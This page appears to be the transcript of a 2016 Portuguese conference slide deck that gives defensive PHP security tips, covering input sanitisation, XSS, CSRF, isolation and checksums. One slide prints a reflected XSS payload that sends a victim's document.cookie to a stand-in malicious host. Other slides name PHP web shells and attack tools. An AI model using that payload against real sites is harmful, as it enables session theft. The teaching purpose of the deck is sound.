Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Dicas de segurança para o PHP e seus amigos

Joubert RedRat
November 18, 2016
Technology
0
23

Dicas de segurança para o PHP e seus amigos

Joubert RedRat

November 18, 2016
Tweet

More Decks by Joubert RedRat

See All by Joubert RedRat
Retome o controle do seu analytics com Matomo
joubertredrat
0
12
#tbt do PHP, a evolução da linguagem nos últimos 30 anos
joubertredrat
0
10
DevBox, o meu pequeno projeto open source para o dia a dia do dev
joubertredrat
0
9
O poder do Object Calisthenics no PHP
joubertredrat
0
65
Playing with Docker and Docker Compose
joubertredrat
0
95
Why migrate your application to microservices?
joubertredrat
0
15
Por que migrar sua aplicação para Microserviços?
joubertredrat
0
23
Uso prático de fakes para mocks no Golang
joubertredrat
0
71
Brincando com comandos no Golang
joubertredrat
0
110

Other Decks in Technology

See All in Technology
Oracle Cloud Infrastructure:2024年4月度サービス・アップデート
oracle4engineer
PRO
1
110
マルチアカウント環境への発見的統制の導入
ch1aki
1
1.3k
ユーザーストーリーのレビューを自動化したみたの
bun913
1
330
GraphQL 成熟度モデルの紹介と、プロダクトに当てはめた事例 / GraphQL maturity model
mh4gf
4
110
SPI原点回帰論:事業課題とFour Keysの結節点を見出す実践的ソフトウェアプロセス改善 / DevOpsDays Tokyo 2024
visional_engineering_and_design
4
1.6k
転移学習とドメイン適応の基礎
kmatsui
2
570
LLM とプロンプトエンジニアリング/チューターをビルドする / LLM and Prompt Engineering and Building Tutors
ks91
PRO
0
220
o11y入門_外形監視を利用したWebアプリケーションへの最適なモニタリング_TechBrew
k5k
3
100
2024/4/26 コンピュータ歴史博物館解説告知
toshi_atsumi
0
200
OpenTelemetry を使ったトレースエグザンプラーの活用 / otel-trace-exemplar
k6s4i53rx
2
640
Google Cloud の AI を支える裏側のインフラを垣間見る!
maroon1st
0
190
スタートアップの技術顧問を3年間続けて発生した事と気付き
biwakonbu
0
160

Featured

See All Featured
Docker and Python
trallard
33
2.7k
The Mythical Team-Month
searls
215
42k
A better future with KSS
kneath
231
16k
Build The Right Thing And Hit Your Dates
maggiecrowley
23
2k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
24
2.3k
Code Reviewing Like a Champion
maltzj
513
39k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
12
1.5k
The Psychology of Web Performance [Beyond Tellerrand 2023]
tammyeverts
5
1.5k
Java REST API Framework Comparison - PWX 2021
mraible
PRO
18
6.9k
Scaling GitHub
holman
457
140k
jQuery: Nuts, Bolts and Bling
dougneiner
59
7.1k
Gamification - CAS2011
davidbonilla
76
4.6k

Transcript

  1. Dicas de segurança para o PHP e seus amigos BHACK

    2016 – SEGURANÇA TI CONHECIMENTO

  2. Eu? Sou este ai https://github.com/joubertredrat https://br.linkedin.com/in/joubertredrat https://twitter.com/joubertredrat http://www.vivaolinux.com.br/~joubertredrat * no

    meu Linkedin explica o porque do apelido RedRat https://creativecommons.org/licenses/by-sa/4.0/ Dicas de segurança para o PHP e seus amigos

  3. Dicas de segurança para o PHP e seus amigos INFORMAÇÃO

    É PODER QUEM TEM INFORMAÇÃO DOMINA O MUNDO

  4. Dicas de segurança para o PHP e seus amigos 1ª

    DICA REMOVER INFORMAÇÕES DESNECESSÁRIAS

  5. Dicas de segurança para o PHP e seus amigos 1ª

    DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS

  6. Dicas de segurança para o PHP e seus amigos 1ª

    DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS

  7. Dicas de segurança para o PHP e seus amigos 2ª

    DICA ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS

  8. Dicas de segurança para o PHP e seus amigos 2ª

    DICA - ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS

  9. Dicas de segurança para o PHP e seus amigos 3ª

    DICA DESABILITAR OU EVITAR RECURSOS EXTERNOS

  10. Dicas de segurança para o PHP e seus amigos 3ª

    DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS R57 R6 C99Shell C100Shell bypass Tool25 b374k GaZa

  11. Dicas de segurança para o PHP e seus amigos 3ª

    DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS http://php.net/allow-url-include

  12. Dicas de segurança para o PHP e seus amigos 4ª

    DICA USAR URL AMIGÁVEIS E EVITAR QUERY STRING

  13. Dicas de segurança para o PHP e seus amigos 4ª

    DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING

  14. Dicas de segurança para o PHP e seus amigos 5ª

    DICA TRATAR OS DADOS VINDOS DO USUÁRIO MESMO ASSIM QUER USAR QUERY STRING? 4ª DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING

  15. Dicas de segurança para o PHP e seus amigos 5ª

    DICA - TRATAR OS DADOS VINDOS DO USUÁRIO filter_var mysqli_stmt_bind_param PDOStatement::bindValue DateTime::getLastErrors(); is_(bool,callable,numeric,float,string,object,etc) Libs no Packagist

  16. Dicas de segurança para o PHP e seus amigos 5ª

    DICA - TRATAR OS DADOS VINDOS DO USUÁRIO Quer fazer testes? sqlmap Zed Attack Proxy “ZAP” BeEF sqlninja

  17. Dicas de segurança para o PHP e seus amigos 6ª

    DICA EVITAR O USO DA PRIMARY KEY OU ID

  18. Dicas de segurança para o PHP e seus amigos 6ª

    DICA - EVITAR O USO DA PRIMARY KEY OU ID • UUID • GUID • MD5/CRC32/SHA1/SHA256 • Hash ou Ofuscamento

  19. Dicas de segurança para o PHP e seus amigos 6ª

    DICA - EVITAR O USO DA PRIMARY KEY OU ID

  20. Dicas de segurança para o PHP e seus amigos 7ª

    DICA (PRIMA DA 5ª DICA) CROSS-SITE SCRIPTING

  21. Dicas de segurança para o PHP e seus amigos 7ª

    DICA - CROSS-SITE SCRIPTING

  22. Dicas de segurança para o PHP e seus amigos 7ª

    DICA - CROSS-SITE SCRIPTING

  23. Dicas de segurança para o PHP e seus amigos 7ª

    DICA - CROSS-SITE SCRIPTING

  24. Dicas de segurança para o PHP e seus amigos 7ª

    DICA - CROSS-SITE SCRIPTING results.php?q=<script>window.open("http://site.do.mal/get.php?cookie=" + document.cookie, "_blank");</script>

  25. Dicas de segurança para o PHP e seus amigos 8ª

    DICA CROSS SITE REQUEST FORGERY

  26. Dicas de segurança para o PHP e seus amigos 8ª

    DICA - CROSS SITE REQUEST FORGERY

  27. Dicas de segurança para o PHP e seus amigos 9ª

    DICA USAR CHECKSUM OU O VCS AO SEU FAVOR

  28. Dicas de segurança para o PHP e seus amigos 9ª

    DICA - USAR CHECKSUM OU O VCS AO SEU FAVOR

  29. Dicas de segurança para o PHP e seus amigos ACABOU

    AS DICAS POR HOJE PERGUNTAS? FALA QUE NÃO TEM 